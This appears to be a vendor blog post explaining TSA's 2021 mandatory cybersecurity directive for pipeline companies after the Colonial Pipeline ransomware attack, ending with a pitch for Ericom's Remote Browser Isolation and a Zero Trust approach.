The Transportation Security Administration (TSA), a part of the Department of Homeland Security (DHS), recently announced that it is issuing mandatory cybersecurity requirements for the pipeline sector. The announcement comes in the wake of the Colonial Pipeline ransomware attack that led the company to shut down its pipeline for 11 days, leading to fuel shortages on the East Coast. The company paid a $4 million ransom, but it’s been reported that the decryption keys they received didn’t work very well, and most of the recovery was affected from the company’s own backup systems.
The shutdown highlighted the vulnerability of critical infrastructure to attacks of this nature, and how attacks on private companies can have major impact on the ability of critical systems to function.
With this new directive, the pipeline sector joins a handful of other industries, including nuclear power plants and bulk electric power that must comply with mandatory cybersecurity guidelines. An attempt by Congress to extend mandatory cybersecurity guidance to a wider range of critical infrastructure industries failed after the Chamber of Commerce mounted strong opposition to the plan. With the growing number of attacks on critical infrastructure it would not be surprising to see additional mandatory requirements imposed on other industries on an industry-by-industry basis by the relevant regulatory authorities.
Most people are familiar with the TSA from its most public-facing feature: airport security. Pipelines are considered a form of transportation because they move goods – typically fuel, gas, or chemicals – from place to place. They were originally regulated by the Department of Transportation, but after the creation of TSA in 2002 pipeline security responsibilities were transferred to the new organization.
One of the biggest challenges in securing America’s critical infrastructure from cyberattacks is that there is no central organization responsible for cybersecurity. Instead, there is a patchwork of regulations, industry by industry. The Energy Department issues cyber regulations for bulk electric providers, while DHS issues rules for chemical plants, and the Nuclear Regulatory Commission (NRC) issues rules for nuclear power. Conceivably a pipeline carrying chemicals could be obligated to follow two completely different sets of cybersecurity rules, one coming from DHS for chemical facilities, and one from TSA for pipeline companies.
New Requirements for Pipeline Companies
On May 28, 2021, TSA issued Security Directive Pipeline-2021-01. See the directive for details; in general, the new regulations include:
- Companies must designate a Cybersecurity Coordinator who is to be available 24×7.
- Cybersecurity incidents must be reported to CISA (Cybersecurity and Infrastructure Security Agency).
- Companies will be required to review their cybersecurity measures and identify any gaps.
- Identify remediation measures to address cyber-risks.
- Report the results to TSA and CISA within 30 days.
Getting Ahead of the New Rules
Having a coordinator and having procedures in place are important steps to comply with the regulations, but far more important for your organization’s actual security are remediation measures you put in place to protect your cyber infrastructure.
Ransomware, as was used in the Colonial Pipeline attack, is an increasingly common attack vector against critical infrastructure. With over 90% of ransomware attacks being delivered by email or infected websites, one of the most important steps you can take is to protect your organization against such attacks using Remote Browser Isolation (RBI). With RBI, websites are opened in a virtual browser in an isolated container in the cloud; no code (good or bad) is run on the user’s device. Only safe rendering data is sent to the user’s regular browser, where they interact with it as they would with the actual website. Ericom’s RBI solution also automatically disinfects email attachments by deactivating any active elements before they are presented to the user. And suspected phishing sites can be automatically opened in “read-only” mode to prevent users from entering credentials.
RBI is one part of an overall Zero Trust approach to cybersecurity. Zero Trust is the only way to protect against many “zero-day” exploits; it assumes that any user, any traffic on or off the network, is potentially dangerous, and takes steps to stop or minimize any potential hazards.